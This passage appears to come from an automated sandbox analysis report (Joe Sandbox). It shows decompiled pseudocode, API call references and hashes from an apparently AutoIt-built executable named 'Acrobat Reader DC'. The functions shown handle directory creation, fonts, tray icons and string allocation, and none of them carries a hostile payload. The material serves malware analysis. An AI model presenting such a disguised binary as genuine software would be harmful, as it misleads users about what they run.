                                  0x0042702e
                                  0x00401d3a
                                  0x00427033
                                  0x00427035
                                  0x00427035
                                  0x0042703b
                                  0x00427041
                                  0x00427050
                                  0x00427056
                                  0x0042705f
                                  0x00427063
                                  0x00427066
                                  0x00427066
                                  0x00427063
                                  0x0042706b
                                  0x0042706c
                                  0x00427074
                                  0x00401d40
                                  0x00401d46
                                  0x00401d49
                                  0x00401d4e
                                  0x00401d55
                                  0x00401d5b
                                  0x00401d60
                                  0x00401d65
                                  0x00401d68
                                  0x00401d6f
                                  0x00401d7a
                                  0x00401d83
                                  0x00401dbf
                                  0x00401dbf
                                  0x00401dc4
                                  0x00401dc9
                                  0x0042707a
                                  0x0042707a
                                  0x00401dd1
                                  0x00401dd9
                                  0x00401de1
                                  0x00401de9
                                  0x00401df4
                                  0x00401df9
                                  0x00401dff
                                  0x00401e05
                                  0x00401e0d
                                  0x00401e0e
                                  0x00401e1c
                                  0x00401e27
                                  0x00401e2f
                                  0x00401e34
                                  0x00401e3a
                                  0x00401e40
                                  0x00401e48
                                  0x00401e49
                                  0x00401e4e
                                  0x00401e57
                                  0x00401e5d
                                  0x00401e65
                                  0x00401e66
                                  0x00401e6b
                                  0x00401e74
                                  0x00401e7a
                                  0x00401e82
                                  0x00401e83
                                  0x00401e88
                                  0x00401e91
                                  0x00401e97
                                  0x00401e9f
                                  0x00401ea0
                                  0x00401eae
                                  0x00401eb9
                                  0x00401ec4
                                  0x00401ecf
                                  0x00401eda
                                  0x00401ee5
                                  0x00401ef0
                                  0x00401efb
                                  0x00401f06
                                  0x00401f1c
                                  0x00401d85
                                  0x00401d85
                                  0x00401d8c
                                  0x00401d95
                                  0x00401da6
                                  0x00401dab
                                  0x00401db0
                                  0x00401db3
                                  0x00401db6
                                  0x00000000
                                  0x00401d8c
                                  0x00401d83

                                  APIs
                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                  • DestroyWindow.USER32(?), ref: 00426F50
                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                  • String ID: close all
                                  • API String ID: 4174999648-3243417748
                                  • Opcode ID: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                  • Opcode Fuzzy Hash: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                  Download Yara Rule
                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                  • String ID: crts
                                  • API String ID: 586820018-3724388283
                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E004335CD(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				short _v528;
				signed int _t19;
				signed char _t20;
				long _t23;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				short* _t34;
				void* _t35;
				signed int _t36;
				void* _t44;
				void* _t48;
				void* _t49;
				void* _t52;

				_t48 = __esi;
				_t44 = __edi;
				_t35 = __ebx;
				E00433244( &_v528, _a4, 0x104);
				_t19 = E004111C1( &_v528);
				if(_t19 != 0) {
					_t34 = _t52 + _t19 * 2 - 0x20e;
					if( *((short*)(_t52 + _t19 * 2 - 0x20e)) == 0x5c) {
						 *_t34 = 0;
					}
				}
				_t20 = GetFileAttributesW( &_v528);
				if(_t20 != 0xffffffff) {
					__eflags = _t20 & 0x00000010;
					if((_t20 & 0x00000010) != 0) {
						goto L6;
					} else {
						goto L14;
					}
				} else {
					_t23 = GetLastError();
					if(_t23 != 2) {
						__eflags = _t23 - 3;
						if(__eflags != 0) {
							L14:
							__eflags = 0;
							return 0;
						} else {
							goto L8;
						}
					} else {
						if(CreateDirectoryW( &_v528, 0) == 0) {
							L8:
							_push(_t48);
							_push(_t44);
							_t49 = E00410160( &_v528, __eflags);
							_t25 = E00413E8A(_t49, 0x5c);
							__eflags = _t25;
							if(__eflags != 0) {
								_push(_t35);
								 *_t25 = 0;
								_t26 = E004335CD(_t35,  &_v528, _t49, __eflags, _t49);
								_push(_t49);
								_t36 = _t26;
								E004111DC();
								__eflags = _t36;
								if(_t36 != 0) {
									_t29 = CreateDirectoryW( &_v528, 0);
									__eflags = _t29;
									_t15 = _t29 != 0;
									__eflags = _t15;
									_t36 = _t36 & 0xffffff00 | _t15;
								}
								return _t36;
							} else {
								_push(_t49);
								E004111DC();
								__eflags = 0;
								return 0;
							}
						} else {
							L6:
							return 1;
						}
					}
				}
			}

















                                  0x004335cd
                                  0x004335cd
                                  0x004335cd
                                  0x004335e6
                                  0x004335f2
                                  0x004335fc
                                  0x00433607
                                  0x0043360e
                                  0x00433612
                                  0x00433612
                                  0x0043360e
                                  0x0043361c
                                  0x00433625
                                  0x004336bb
                                  0x004336bd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043362b
                                  0x0043362b
                                  0x00433634
                                  0x0043364f
                                  0x00433652
                                  0x004336bf
                                  0x004336bf
                                  0x004336c4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00433636
                                  0x00433647
                                  0x00433654
                                  0x00433654
                                  0x00433655
                                  0x00433661
                                  0x00433666
                                  0x0043366e
                                  0x00433670
                                  0x00433683
                                  0x00433687
                                  0x0043368a
                                  0x0043368f
                                  0x00433690
                                  0x00433692
                                  0x0043369a
                                  0x0043369c
                                  0x004336a7
                                  0x004336ad
                                  0x004336af
                                  0x004336af
                                  0x004336af
                                  0x004336af
                                  0x004336ba
                                  0x00433672
                                  0x00433672
                                  0x00433673
                                  0x0043367c
                                  0x00433682
                                  0x00433682
                                  0x00433649
                                  0x00433649
                                  0x0043364e
                                  0x0043364e
                                  0x00433647
                                  0x00433634

                                  APIs
                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                  • _wcslen.LIBCMT ref: 004335F2
                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                  • GetLastError.KERNEL32 ref: 0043362B
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                  • _wcsrchr.LIBCMT ref: 00433666
                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                  • String ID: \
                                  • API String ID: 321622961-2967466578
                                  • Opcode ID: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                  • Opcode Fuzzy Hash: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0044C7DD(void* __ecx, void* __edi, char* _a4, intOrPtr _a8) {
				short _t17;
				signed int _t23;
				char* _t35;
				void* _t37;
				void* _t46;
				void* _t49;

				_t37 = __ecx;
				_t35 = _a4;
				_t48 = _a8;
				if(E0041341F(_a8, L"#notrayicon", 0xb) != 0) {
					_t17 = E0041341F(_t48, L"#requireadmin", 0xd);
					__eflags = _t17;
					if(_t17 != 0) {
						__eflags = E0041341F(_t48, L"#OnAutoItStartRegister", 0x16);
						if(__eflags != 0) {
							goto L8;
						} else {
							_push(__edi);
							_t49 = E00410160(_t48 + 0x2c, __eflags);
							E00444B5F(_t37, _t49);
							E00444BBB(_t37, __eflags, _t49);
							_t23 = E004111C1(_t49);
							__eflags =  *((short*)(_t49 + _t23 * 2 - 2)) - 0x22;
							if( *((short*)(_t49 + _t23 * 2 - 2)) != 0x22) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 8))))(_t49);
								_push(_t49);
								E004111DC();
								return 1;
							} else {
								__eflags = 0;
								_t7 = _t49 + 2; // 0x2
								_t46 = _t7;
								 *((short*)(_t49 + _t23 * 2 - 2)) = 0;
								E00444B5F(0, _t46);
								E00444BBB(0, __eflags, _t46);
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 8))))(_t46);
								_push(_t49);
								E004111DC();
								return 1;
							}
						}
					} else {
						 *((char*)(_t35 + 1)) = 1;
						L8:
						return 1;
					}
				} else {
					 *_t35 = 1;
					return 1;
				}
			}









                                  0x0044c7dd
                                  0x0044c7e1
                                  0x0044c7e5
                                  0x0044c7fa
                                  0x0044c8ae
                                  0x0044c8b6
                                  0x0044c8b8
                                  0x0044c81e
                                  0x0044c820
                                  0x00000000
                                  0x0044c826
                                  0x0044c826
                                  0x0044c82f
                                  0x0044c832
                                  0x0044c838
                                  0x0044c83e
                                  0x0044c846
                                  0x0044c84c
                                  0x0044c88f
                                  0x0044c891
                                  0x0044c892
                                  0x0044c8a3
                                  0x0044c84e
                                  0x0044c84e
                                  0x0044c850
                                  0x0044c850
                                  0x0044c854
                                  0x0044c859
                                  0x0044c85f
                                  0x0044c86d
                                  0x0044c86f
                                  0x0044c870
                                  0x0044c881
                                  0x0044c881
                                  0x0044c84c
                                  0x0044c8be
                                  0x0044c8be
                                  0x0044c8c3
                                  0x0044c8ca
                                  0x0044c8ca
                                  0x0044c801
                                  0x0044c801
                                  0x0044c80b
                                  0x0044c80b

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                  • API String ID: 1038674560-2734436370
                                  • Opcode ID: 16a74993e68b4dbac8944d2924510ff916fa528a3ea3e4646b41ce1c45576bf7
                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                  • Opcode Fuzzy Hash: 16a74993e68b4dbac8944d2924510ff916fa528a3ea3e4646b41ce1c45576bf7
                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434EC4 Relevance: 12.1, APIs: 8, Instructions: 115memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
                                  • SysAllocString.OLEAUT32(?), ref: 00434F64
                                  • SysFreeString.OLEAUT32(?), ref: 00434F6D
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
                                  • SysAllocString.OLEAUT32(?), ref: 00434FB6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: 5a110d4bb8e620b10c6e39c66250f9a1347d1bb15030520e8e6f343428dd6d14
                                  • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                  • Opcode Fuzzy Hash: 5a110d4bb8e620b10c6e39c66250f9a1347d1bb15030520e8e6f343428dd6d14
                                  • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440F0A Relevance: 12.1, APIs: 8, Instructions: 104windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00440F0A(intOrPtr _a4, struct HDC__* _a8, WCHAR** _a12, signed int _a16, int _a20, struct HWND__* _a24, long _a28, char _a32) {
				void* _t28;
				struct HDC__* _t29;
				signed int _t30;
				struct HWND__** _t46;
				signed int _t67;
				int _t69;

				_t46 = _a8;
				_t67 = _a24;
				_a24 =  *_t46;
				_t28 = _t46[0x10];
				if(_t28 != 0) {
					DeleteObject(_t28);
				}
				_t29 = GetDC(0);
				_a8 = _t29;
				_t30 = GetDeviceCaps(_t29, 0x5a);
				ReleaseDC(0, _a8);
				_t69 = CreateFontW(((0x49f49f49 * _t30 * _a16 >> 0x20) - _t30 * _a16 >> 9 >> 0x1f) + ((0x49f49f49 * _t30 * _a16 >> 0x20) - _t30 * _a16 >> 9), 0, 0, 0, _a20, _t67 & 0x00000002, _t67 & 0x00000004, _t67 & 0x00000008, 1, 4, 0, _a28, 0,  *_a12);
				SendMessageW(_a24, 0x30, _t69, 1);
				if(_t46[0x22] == 1 && _a32 != 0) {
					MoveWindow( *_t46, _t46[0x20], _t46[0x20], _t46[0x21], _t46[0x21], 0);
				}
				if(_t46[0x22] == 0 && _a32 != 0) {
					SendMessageW(_a24, 0x142, 0, 0);
				}
				_t46[0x10] = _t69;
				return E00430B87(_a4, _t46, 1);
			}









                                  0x00440f0f
                                  0x00440f15
                                  0x00440f18
                                  0x00440f1b
                                  0x00440f21
                                  0x00440f24
                                  0x00440f24
                                  0x00440f2c
                                  0x00440f35
                                  0x00440f38
                                  0x00440f46
                                  0x00440fa1
                                  0x00440fa7
                                  0x00440fb0
                                  0x00440fdd
                                  0x00440fdd
                                  0x00440fea
                                  0x00440fff
                                  0x00440fff
                                  0x00441008
                                  0x00441015

                                  APIs
                                  • DeleteObject.GDI32(?), ref: 00440F24
                                  • GetDC.USER32(00000000), ref: 00440F2C
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440F38
                                  • ReleaseDC.USER32 ref: 00440F46
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 00440F90
                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00440FA7
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00440FDD
                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00440FFF
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                  • String ID:
                                  • API String ID: 3864802216-0
                                  • Opcode ID: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                  • Instruction ID: d9fc15c341c8c83caa3938f749aa41814f3de42eaf1e3e6405ddac876be99683
                                  • Opcode Fuzzy Hash: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                  • Instruction Fuzzy Hash: F13164B16402147FEB14CF54DC89FAB3799EB98B15F048169FE08DE2C5D6B9E840CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434FD0 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434FF2
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435017
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435043
                                  • SysAllocString.OLEAUT32(00000000), ref: 0043504A
                                  • SysAllocString.OLEAUT32(00000000), ref: 00435072
                                  • SysFreeString.OLEAUT32(00000000), ref: 0043507B
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0043509B
                                  • SysAllocString.OLEAUT32(?), ref: 004350A9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: ec0972bcfea5d1cdd6d34f28d048cabbc30cea4348a6f33495b4b14b450a5c76
                                  • Instruction ID: f42878b2159185360852a952fd690a32193869b943547c3e204aa20c586f66a1
                                  • Opcode Fuzzy Hash: ec0972bcfea5d1cdd6d34f28d048cabbc30cea4348a6f33495b4b14b450a5c76
                                  • Instruction Fuzzy Hash: DD21B4327001146BD710ABA9EC49FAF73A8EB9D731F04427BFA05DB390DAA5984487F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401250 Relevance: 12.1, APIs: 8, Instructions: 86windowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401250(void* __eax, void* __ecx, struct HWND__* __esi, intOrPtr _a4) {
				struct _NOTIFYICONDATAW _v944;
				int _t34;
				int _t51;
				intOrPtr _t61;
				struct HWND__* _t62;
				void* _t70;

				_t62 = __esi;
				_t34 = __eax - 1;
				if(_t34 != 0) {
					L6:
					return _t34;
				} else {
					_t51 = _t34 + 1;
					_v944.cbSize = 0x3a8;
					E00412F40( &(_v944.hWnd), _t34, 0x3a4);
					E00401B80(_a4, _t70);
					if( *0x4974ea != 0) {
						_t61 = _a4;
						_v944.hWnd = __esi;
						_v944.uID = _t51;
						_v944.uFlags = 2;
						if( *0x4974ec != 0) {
							if( *(_t61 + 0x194) != _t51) {
								 *(_t61 + 0x194) = _t51;
								_v944.hIcon =  *((intOrPtr*)(_t61 + 0x1a8));
								Shell_NotifyIconW(_t51,  &_v944);
							} else {
								 *(_t61 + 0x194) = 0;
								_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
								Shell_NotifyIconW(_t51,  &_v944);
							}
						} else {
							if( *((char*)(_t61 + 9)) != 0) {
								if( *(_t61 + 0x195) == 0) {
									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x1b0));
									 *(_t61 + 0x195) = _t51;
									Shell_NotifyIconW(_t51,  &_v944);
								} else {
									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
									 *(_t61 + 0x195) = 0;
									Shell_NotifyIconW(_t51,  &_v944);
								}
							} else {
								if( *(_t61 + 0x194) == _t51) {
									 *(_t61 + 0x194) = 0;
									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
									Shell_NotifyIconW(_t51,  &_v944);
								}
							}
						}
					}
					KillTimer(_t62, _t51);
					_t34 = SetTimer(_t62, _t51, 0x2ee, 0);
					goto L6;
				}
			}









                                  0x00401250
                                  0x00401259
                                  0x0040125c
                                  0x004012e8
                                  0x004012ed
                                  0x00401262
                                  0x00401268
                                  0x00401272
                                  0x0040127c
                                  0x00401287
                                  0x00401293
                                  0x0040129c
                                  0x0040129f
                                  0x004012a5
                                  0x004012ab
                                  0x004012b5
                                  0x004272f2
                                  0x00427328
                                  0x0042732e
                                  0x00427334
                                  0x004272f4
                                  0x00427302
                                  0x00427309
                                  0x0042730f
                                  0x0042730f
                                  0x004012bb
                                  0x004012bf
                                  0x00427346
                                  0x0042737c
                                  0x00427382
                                  0x00427388
                                  0x00427348
                                  0x00427356
                                  0x0042735c
                                  0x00427363
                                  0x00427363
                                  0x004012c5
                                  0x004012cb
                                  0x004273a1
                                  0x004273a8
                                  0x004273ae
                                  0x004273ae
                                  0x004012cb
                                  0x004012bf
                                  0x004012b5
                                  0x004012d3
                                  0x004012e2
                                  0x00000000
                                  0x004012e2

                                  APIs
                                  • _memset.LIBCMT ref: 0040127C
                                    • Part of subcall function 00401B80: _memset.LIBCMT ref: 00401C02
                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                  • SetTimer.USER32 ref: 004012E2
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
